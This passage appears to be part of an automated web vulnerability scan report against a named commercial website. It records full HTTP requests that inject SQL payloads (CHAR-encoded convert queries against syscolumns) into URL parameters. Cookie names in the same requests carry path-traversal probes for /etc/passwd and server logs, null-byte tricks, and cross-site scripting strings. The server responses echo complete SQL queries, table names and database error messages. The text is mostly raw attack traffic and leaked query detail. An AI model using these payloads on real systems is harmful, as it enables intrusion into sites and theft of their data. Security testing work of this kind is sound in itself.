convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'' OR prj.project_page_url = 'leadflow/bulo00/project.php?catId=30005&iusrc='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_mobile_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/bulo00/project.php?catId=30005&iusrc='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'' OR prj.project_page_url = 'leadflow/bulo00/project.php?catId=30005&iusrc='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL 
server version for the right syntax to use near 'int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+' at line 5
- /ppc/leadflow/lodi00/project.php

/ppc/leadflow/lodi00/project.php

http://www.insideup.com/ppc/leadflow/lodi00/project.php?catId='%2B%20(select+convert(int,CHAR(95)%2B..

Parameters

Parameter Type Value
catId GET '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
iusrc GET iupsc

Request

GET /ppc/leadflow/lodi00/project.php?catId='%2B%20(select+convert(int,CHAR(95)%2BCHAR(33)%2BCHAR(64)%2BCHAR(50)%2BCHAR(100)%2BCHAR(105)%2BCHAR(108)%2BCHAR(101)%2BCHAR(109)%2BCHAR(109)%2BCHAR(97))+FROM+syscolumns)%20%2B'&iusrc=iupsc HTTP/1.1
Referer: http://www.insideup.com/selectvendors.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x0002ED)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error_log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache2/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x000308]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; 
OAVARS[../../../../../../../../../../proc/self/version]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x000323)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x000332)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; 
OAVARS[avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x000352))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:28:10 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=q2ftsggmpem9ckgjsam91hss84; path=/
Content-Length: 4143
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/lodi00/project.php?catId='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&iusrc=iupsc' OR prj.project_page_url = 'leadflow/lodi00/project.php?catId='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&iusrc=iupsc/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_two_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/lodi00/project.php?catId='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&iusrc=iupsc' OR prj.project_page_url = 'leadflow/lodi00/project.php?catId='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&iusrc=iupsc/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_dynamic_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/lodi00/project.php?catId='+ (select 
convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&iusrc=iupsc' OR prj.project_page_url = 'leadflow/lodi00/project.php?catId='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&iusrc=iupsc/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_video_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/lodi00/project.php?catId='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&iusrc=iupsc' OR prj.project_page_url = 'leadflow/lodi00/project.php?catId='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&iusrc=iupsc/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_mobile_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/lodi00/project.php?catId='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&iusrc=iupsc' OR prj.project_page_url = 'leadflow/lodi00/project.php?catId='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&iusrc=iupsc/'You have an error in your SQL syntax; check the manual that corresponds to 
your MySQL server version for the right syntax to use near 'int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+' at line 5
- /ppc/leadflow/obtm00/project.php

/ppc/leadflow/obtm00/project.php

http://www.insideup.com/ppc/leadflow/obtm00/project.php?catId=80011&iusrc='%2B%20(select+convert(int..

Parameters

Parameter Type Value
catId GET 80011
iusrc GET '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'

Request

GET /ppc/leadflow/obtm00/project.php?catId=80011&iusrc='%2B%20(select+convert(int,CHAR(95)%2BCHAR(33)%2BCHAR(64)%2BCHAR(50)%2BCHAR(100)%2BCHAR(105)%2BCHAR(108)%2BCHAR(101)%2BCHAR(109)%2BCHAR(109)%2BCHAR(97))+FROM+syscolumns)%20%2B' HTTP/1.1
Referer: http://www.insideup.com/selectvendors.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x0002ED)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error_log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache2/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x000308]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; 
OAVARS[../../../../../../../../../../proc/self/version]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x000323)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x000332)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; 
OAVARS[avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x000352))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:29:06 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=gl0kppmln10thkr3lhe37qd3a6; path=/
Content-Length: 4143
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/obtm00/project.php?catId=80011&iusrc='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'' OR prj.project_page_url = 'leadflow/obtm00/project.php?catId=80011&iusrc='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_two_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/obtm00/project.php?catId=80011&iusrc='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'' OR prj.project_page_url = 'leadflow/obtm00/project.php?catId=80011&iusrc='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_dynamic_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/obtm00/project.php?catId=80011&iusrc='+ (select 
convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'' OR prj.project_page_url = 'leadflow/obtm00/project.php?catId=80011&iusrc='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_video_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/obtm00/project.php?catId=80011&iusrc='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'' OR prj.project_page_url = 'leadflow/obtm00/project.php?catId=80011&iusrc='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_mobile_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/obtm00/project.php?catId=80011&iusrc='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'' OR prj.project_page_url = 'leadflow/obtm00/project.php?catId=80011&iusrc='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL 
server version for the right syntax to use near 'int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+' at line 5
- /ppc/leadflow/parl00/project.php

/ppc/leadflow/parl00/project.php

http://www.insideup.com/ppc/leadflow/parl00/project.php?catId=10002&iusrc='%2B%20(select+convert(int..

Parameters

Parameter Type Value
catId GET 10002
iusrc GET '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'

Request

GET /ppc/leadflow/parl00/project.php?catId=10002&iusrc='%2B%20(select+convert(int,CHAR(95)%2BCHAR(33)%2BCHAR(64)%2BCHAR(50)%2BCHAR(100)%2BCHAR(105)%2BCHAR(108)%2BCHAR(101)%2BCHAR(109)%2BCHAR(109)%2BCHAR(97))+FROM+syscolumns)%20%2B' HTTP/1.1
Referer: http://www.insideup.com/selectvendors.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x0002ED)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error_log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache2/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; 